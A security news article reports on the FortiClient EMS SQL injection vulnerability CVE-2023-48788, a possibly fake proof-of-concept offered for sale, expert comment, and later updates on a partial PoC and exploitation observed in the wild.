Critical FortiClient EMS vulnerability fixed, (fake?) PoC for sale (CVE-2023-48788)

A recently fixed SQL injection vulnerability (CVE-2023-48788) in Fortinet’s FortiClient Endpoint Management Server (EMS) solution has apparently piqued the interest of many: Horizon3’s Attack Team means to publish technical details and a proof-of-concept exploit for it next week, and someone is attempting to sell a PoC for less than $300 via GitHub.

About CVE-2023-48788

CVE-2023-48788 is one of the several vulnerabilities recently patched by Fortinet.

“An improper neutralization of special elements used in an SQL Command (‘SQL Injection’) vulnerability [CWE-89] in FortiClientEMS may allow an unauthenticated attacker to execute unauthorized code or commands via specifically crafted requests,” the company’s product security incident response team pithily states in the associated advisory.

The team also shared that the vulnerability was “co-discovered and reported by Thiago Santana from Fortinet ForticlientEMS development team and UK NCSC”, but did not say whether it has been or is currently being exploited in attacks in the wild.

A PoC for CVE-2023-48788

As of Wednesday, someone has set up a GitHub page advertising a “new exploit” for CVE-2023-48788, and linked to a post on SatoshiDisk.com, a web-based platform where users can upload files they want to sell and other users can download them if they pay the set price.

PoC exploit for CVE-2023-48788 offered for sale

Here’s the thing, though: there’s no way to check if the PoC is real or fake before buying it. And we know that scammers and malware peddlers have been using this same pretext in the past to steal money and to deliver malware.

“I think the probability is low that the exploit sold by [this seller] is real. Currently, I do not see an exploit advertised anywhere else,” Dr. Johannes Ullrich, the founder of the SANS Internet Storm Center (ISC), told Help Net Security.

“On the other hand, if this is a relatively simple SQL injection issue, exploitation may not be that difficult, which could also explain the low price.”

He also noted that the vulnerability does not affect Fortinet gateway devices, but FortiClient EMS, instances of which are less likely to be reachable via the internet. According to sites like Shodan, there are only about a couple hundred systems currently exposed, he pointed out.

“At this point, I see almost no scans for Fortinet in [ISC’s] honeypots, and no actual exploit attempt, another indicator that there is no actual exploit widely available right now,” he concluded.

UPDATE (March 21, 2024, 10:50 a.m. ET):

Horizon3.ai has published a deep-dive into the vulnerability and a partial PoC exploit that triggers the SQL injection flaw but doesn’t enable remote code execution.

According to Greynoise’s tag for CVE-2023-48788, exploitation attempts are yet to be spotted, but the company has updated the security advisory, which now says that “this vulnerability is exploited in the wild.”

UPDATE (April 15, 2024, 04:20 a.m. ET):

Red Canary threat researchers have spotted CVE-2023-48788 being exploited by attackers.

“The exploit activity we observed followed a pattern that started with inbound external network connections to the FCMdaemon process and ended with attempts to download and execute RMM tools or PowerShell-based backdoors,” they said last week.